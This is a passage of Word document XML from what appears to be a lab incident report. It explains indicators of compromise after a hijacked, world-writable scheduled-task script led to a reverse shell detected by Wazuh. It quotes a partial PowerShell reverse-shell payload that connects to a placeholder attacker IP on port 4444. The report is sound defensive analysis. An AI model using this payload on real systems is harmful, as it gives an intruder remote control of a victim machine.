          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Writable Task Script: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>This is the "unlocked door." The file cleanup.ps1 allowed unauthorized users to modify its contents. In a secured system, only the "Boss" (Admin/SYSTEM) should have write access, but here, even a "Guest" (Authenticated User) could overwrite it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAB7356" w14:textId="77777777" w:rsidR="008847FC" w:rsidRPr="008847FC" w:rsidRDefault="008847FC" w:rsidP="008847FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Location: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>C:\TaskScripts\cleanup.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F74AAD1" w14:textId="77777777" w:rsidR="008847FC" w:rsidRPr="008847FC" w:rsidRDefault="008847FC" w:rsidP="008847FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Value: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Only SYSTEM and Administrators should have "Write/Modify" permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CA0870" w14:textId="77777777" w:rsidR="008847FC" w:rsidRPr="00233B66" w:rsidRDefault="008847FC" w:rsidP="008847FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Compromise Indicator: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Authenticated Users group has "FullControl" access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0637F730" w14:textId="77777777" w:rsidR="00233B66" w:rsidRPr="008847FC" w:rsidRDefault="00233B66" w:rsidP="00233B66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B29BEA" w14:textId="08E6AC53" w:rsidR="008847FC" w:rsidRPr="008847FC" w:rsidRDefault="008847FC" w:rsidP="008847FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Malicious ScriptBlock: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>This is the "recorded footage." The security tool (Wazuh) caught the exact moment the malicious code ran. It recorded a specific ID number and the exact PowerShell commands that told the computer to "call" the attacker's IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1410B7" w14:textId="77777777" w:rsidR="008847FC" w:rsidRPr="008847FC" w:rsidRDefault="008847FC" w:rsidP="008847FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>ScriptBlock ID:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> d21a34ef-dc19-4470-a39d-cf9f4578d83e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D1F281" w14:textId="77777777" w:rsidR="008847FC" w:rsidRPr="008847FC" w:rsidRDefault="008847FC" w:rsidP="008847FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Content (Captured Payload):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> ```powershell $c = New-Object System.Net.Sockets.TCPClient("&lt;ATTACKER_IP&gt;", 4444); $s = $c.GetStream(); [byte[]]$b = 0..65535|%{0}; ... $sendbyte = ([text.encoding]::ASCII).GetBytes("PS " + (Get-Location).Path + "&gt; "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="72511747" w14:textId="77777777" w:rsidR="008847FC" w:rsidRPr="008847FC" w:rsidRDefault="008847FC" w:rsidP="008847FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Significance: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>The log specifically shows the use of System.Net.Sockets.TCPClient to connect to &lt;ATTACKER_IP&gt; on port 4444, which is characteristic of a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AECF5AD" w14:textId="77777777" w:rsidR="002376A2" w:rsidRDefault="002376A2" w:rsidP="002376A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46709324" w14:textId="77777777" w:rsidR="00404DCF" w:rsidRDefault="00404DCF" w:rsidP="002376A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB048DC" w14:textId="5D1531FD" w:rsidR="00C3112D" w:rsidRPr="00956AEB" w:rsidRDefault="002376A2" w:rsidP="002376A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Command-line / Configuration IoCs (The "How") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:bCs/>
        </w:rPr>
        <w:t>This explains the "behavior" of the computer during the attack.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4E87FE" w14:textId="77777777" w:rsidR="00C06F13" w:rsidRDefault="00C06F13" w:rsidP="00C06F13">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="594CBA7F" w14:textId="77777777" w:rsidR="00CC442B" w:rsidRPr="00CC442B" w:rsidRDefault="00CC442B" w:rsidP="00CC442B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh Detection Pattern: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>This is like a security alarm going off because it saw someone wearing a mask. The alarm (specifically Rule T1059.001) triggered because it saw PowerShell being used to run code from a "string" (text), which is a common trick used by hackers to hide their real intentions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9B7FBD" w14:textId="77777777" w:rsidR="00CC442B" w:rsidRPr="00CC442B" w:rsidRDefault="00CC442B" w:rsidP="00CC442B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Rule ID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>T1059.001 (Command and Scripting Interpreter: PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B805B30" w14:textId="77777777" w:rsidR="00CC442B" w:rsidRPr="00436405" w:rsidRDefault="00CC442B" w:rsidP="00CC442B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Activity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>The telemetry shows the execution of Invoke-Expression (IEX) and Get-Content -Stream patterns, which are used to convert text strings into executable commands in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5689E9" w14:textId="77777777" w:rsidR="00436405" w:rsidRPr="00CC442B" w:rsidRDefault="00436405" w:rsidP="00436405">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46371F12" w14:textId="1B293309" w:rsidR="00CC442B" w:rsidRPr="00CC442B" w:rsidRDefault="00CC442B" w:rsidP="00CC442B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Alert Level: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAFDF30" w14:textId="77777777" w:rsidR="00CC442B" w:rsidRDefault="00CC442B" w:rsidP="00CC442B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Process Chain: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>This is the "family tree" of the attack. It shows that the Task Scheduler (the parent) started PowerShell (the child), which then immediately reached out to the internet. Normally, a simple cleanup script shouldn't be making "phone calls" to an external IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5C1532" w14:textId="77777777" w:rsidR="00436405" w:rsidRPr="00CC442B" w:rsidRDefault="00436405" w:rsidP="00CC442B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351212A0" w14:textId="77777777" w:rsidR="00CC442B" w:rsidRPr="00CC442B" w:rsidRDefault="00CC442B" w:rsidP="00CC442B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Process Lineage: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>svchost.exe (Task Scheduler Service) $\rightarrow$ powershell.exe (Running the hijacked script) $\rightarrow$ Network Connection established to &lt;ATTACKER_IP&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116143F8" w14:textId="77777777" w:rsidR="00CC442B" w:rsidRPr="00CC442B" w:rsidRDefault="00CC442B" w:rsidP="00CC442B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">Parent Process ID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>The logs identify the parent as the system service responsible for scheduled tasks, confirming the T1053.005 technique was used for execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57791AB1" w14:textId="77777777" w:rsidR="00933634" w:rsidRDefault="00933634" w:rsidP="00500AD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D7675A" w14:textId="77777777" w:rsidR="006D2F8F" w:rsidRDefault="006D2F8F" w:rsidP="00500AD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69906D70" w14:textId="5595F348" w:rsidR="009B3923" w:rsidRPr="00CF5C87" w:rsidRDefault="002376A2" w:rsidP="002376A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Network IoCs (The "Where") </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>(This shows where the stolen data or the "phone call" went.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C36363" w14:textId="46192E9C" w:rsidR="009B3923" w:rsidRPr="009B3923" w:rsidRDefault="009B3923" w:rsidP="009B3923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1E02B4" w14:textId="7E8947CD" w:rsidR="009B3923" w:rsidRDefault="009B3923" w:rsidP="000D7184">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Reverse Shell Callback:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is the actual connection. It shows the "Source" (your Windows machine &lt;VICTIM_IP&gt;) calling the "Destination" (the Kali Linux machine &lt;ATTACKER_IP&gt;). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Port 4444</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the specific "doorway" they used to talk to each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A69C97" w14:textId="7335DF72" w:rsidR="00680EA3" w:rsidRPr="00680EA3" w:rsidRDefault="00680EA3" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;VICTIM_IP&gt; (Windows-VM) (Victim)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD20A2D" w14:textId="0B9AB016" w:rsidR="00680EA3" w:rsidRPr="00680EA3" w:rsidRDefault="00680EA3" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Destination:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;ATTACKER_IP&gt; (Kali) (Attacker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDD5F8F" w14:textId="2A0E3876" w:rsidR="00680EA3" w:rsidRPr="00680EA3" w:rsidRDefault="00680EA3" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
